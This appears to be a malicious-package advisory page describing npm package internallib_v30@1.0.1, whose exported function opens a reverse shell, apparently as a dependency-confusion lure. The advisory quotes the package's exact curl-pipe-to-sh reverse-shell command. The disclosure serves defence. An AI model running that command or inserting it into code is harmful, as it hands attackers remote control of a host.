Logo
npm

internallib_v30@1.0.1

Vulnerability report · Last retrieved from osv.dev October 6, 2026 at 2:31 PM UTC

Malicious

OSV ID

MAL-2026-17633

Ecosystem

npm

Summary

internallib_v30@1.0.1 ships a single index.js whose exported command() function invokes /bin/bash -c with 'curl https://reverse-shell.sh/10.0.19.80:8443 | sh', fetching a remote shell script over HTTPS and piping it directly into sh. Invoking the exported function from any consumer causes the installer host to download and execute attacker-staged code that opens a reverse shell to 10.0.19.80 on port 8443. The package has no documented legitimate purpose, empty author/description metadata, and a name consistent with an internal/dependency-confusion target.

Source: amazon-inspector (52b503d4f5d82ea2a67ac1cb9e3bbb82d009d375495f72cf13623f998a239cfe)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.